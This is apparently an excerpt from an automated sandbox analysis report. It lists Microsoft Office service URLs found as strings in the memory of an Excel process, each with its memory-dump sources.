Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://apis.live.net/v5.0/Url
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/OneNoteBulletinshttps://
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://augloop.office.com
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://augloop.office.com/v2
Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmp String found in binary or memory: https://augloop.office.com/v2Bearer
Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmp String found in binary or memory: https://augloop.office.com/v2https://login.windows.net/common/oauth2/authorize
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://augloop.office.com/v2i
Source: EXCEL.EXE, 00000001.00000003.599068019.0000000012B5F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291939744.0000000012B5F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601504361.0000000012B5C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564335933.0000000012B5F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738776475.0000000012B5E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660234147.0000000012B5D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289261489.0000000012B5F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620615824.0000000012B5D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754863288.0000000012B5E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623614960.0000000012B5D000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://augloop.office.come
Source: EXCEL.EXE, 00000001.00000002.751574667.000000000D65E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289495071.0000000012AA6000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmld2db8
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://cdn.entity.
Source: EXCEL.EXE, 00000001.00000003.604153523.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622581671.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565377395.000000000F2FA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619496038.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618391633.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.753326969.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599684580.000000000F2F9000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://clients.config.office.net/
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/H
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/O&
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policiesRm
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/user/v1.0/ios(U
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/user/v1.0/macw/
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: EXCEL.EXE, 00000001.00000003.604153523.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622581671.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565377395.000000000F2FA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619496038.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618391633.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.753326969.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599684580.000000000F2F9000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey(
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/z&
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://cloudfiles.onenote.com/upload.aspxOneNoteCloudFilesConsumerEmbedhttps://onedrive.live.com/em
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://cloudfiles.onenote.com/upload.aspxQj
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://config.edge.skype.com
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://config.edge.skype.com/config/v2/OfficeKk
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://cortana.ai
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://cortana.ai/api
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://cortana.aietl
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://cr.office.com
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.o365filtering.com/0
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.o365filtering.com/https://login.windows.net/common/oauth2/authorize
